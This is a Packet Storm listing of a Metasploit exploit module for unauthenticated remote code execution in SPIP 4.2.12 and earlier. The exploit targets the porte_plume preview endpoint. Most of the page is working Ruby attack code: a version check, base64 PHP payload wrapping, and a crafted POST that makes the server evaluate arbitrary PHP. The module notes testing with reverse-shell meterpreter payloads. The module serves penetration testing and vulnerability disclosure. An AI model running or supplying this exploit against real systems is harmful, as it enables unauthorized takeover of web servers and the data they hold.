what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SPIP 4.2.12 Remote Code Execution

SPIP 4.2.12 Remote Code Execution
Posted Aug 22, 2024
Authored by Valentin Lobstein, Laluka, Julien Voisin | Site metasploit.com

This Metasploit module exploits a remote code execution vulnerability in SPIP versions up to and including 4.2.12. The vulnerability occurs in SPIP's templating system where it incorrectly handles user-supplied input, allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a payload manipulating the templating data processed by the echappe_retour() function, invoking traitements_previsu_php_modeles_eval(), which contains an eval() call.

tags | exploit, remote, arbitrary, php, code execution
SHA-256 | 220b4c7418ac511ddb8ab8d9f4dfe87f0368c9ca91b9699fa9d3b9a0c425f434

SPIP 4.2.12 Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Payload::Php
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'SPIP Unauthenticated RCE via porte_plume Plugin',
'Description' => %q{
This module exploits a Remote Code Execution vulnerability in SPIP versions up to and including 4.2.12.
The vulnerability occurs in SPIP’s templating system where it incorrectly handles user-supplied input,
allowing an attacker to inject and execute arbitrary PHP code. This can be achieved by crafting a
payload manipulating the templating data processed by the `echappe_retour()` function, invoking
`traitements_previsu_php_modeles_eval()`, which contains an `eval()` call.
},
'Author' => [
'Valentin Lobstein', # Metasploit module author
'Laluka', # Vulnerability discovery
'Julien Voisin' # Review
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://blog.spip.net/Mise-a-jour-critique-de-securite-sortie-de-SPIP-4-3-0-alpha2-SPIP-4-2-13-SPIP-4.html'],
['URL', 'https://thinkloveshare.com/hacking/spip_preauth_rce_2024_part_1_the_feather']
],
'Platform' => ['php', 'unix', 'linux', 'win'],
'Arch' => [ARCH_PHP, ARCH_CMD],
'Targets' => [
[
'PHP In-Memory', {
'Platform' => 'php',
'Arch' => ARCH_PHP
# tested with php/meterpreter/reverse_tcp
}
],
[
'Unix/Linux Command Shell', {
'Platform' => ['unix', 'linux'],
'Arch' => ARCH_CMD
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp
}
],
[
'Windows Command Shell', {
'Platform' => 'win',
'Arch' => ARCH_CMD
# tested with cmd/windows/http/x64/meterpreter/reverse_tcp
}
]
],
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => '2024-08-16',
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
end

def check
uri = normalize_uri(target_uri.path, 'spip.php')
res = send_request_cgi({ 'uri' => uri.to_s })

return Exploit::CheckCode::Unknown('Target is unreachable.') unless res
return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200

version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text
return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/

version = ::Regexp.last_match(1)

if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/
version = ::Regexp.last_match(1)
end

return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version

print_status("SPIP Version detected: #{version}")

if Rex::Version.new(version) > Rex::Version.new('4.2.12')
return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")
end

return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")
end

def php_exec_cmd(encoded_payload)
dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
shell = <<-END_OF_PHP_CODE
#{php_preamble(disabled_varname: dis)}
$c = base64_decode("#{encoded_clean_payload}");
#{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
END_OF_PHP_CODE
return shell
end

def exploit
print_status('Preparing to send exploit payload to the target...')
phped_payload = target['Arch'] == ARCH_PHP ? payload.encoded : php_exec_cmd(payload.encoded)
b64_payload = framework.encoders.create('php/base64').encode(phped_payload)
payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{b64_payload} ?>`]"

print_status('Sending exploit payload to the target...')
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'spip.php'),
'vars_get' => {
'action' => 'porte_plume_previsu'
},
'data' => "data=#{payload}"
})
end

end
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close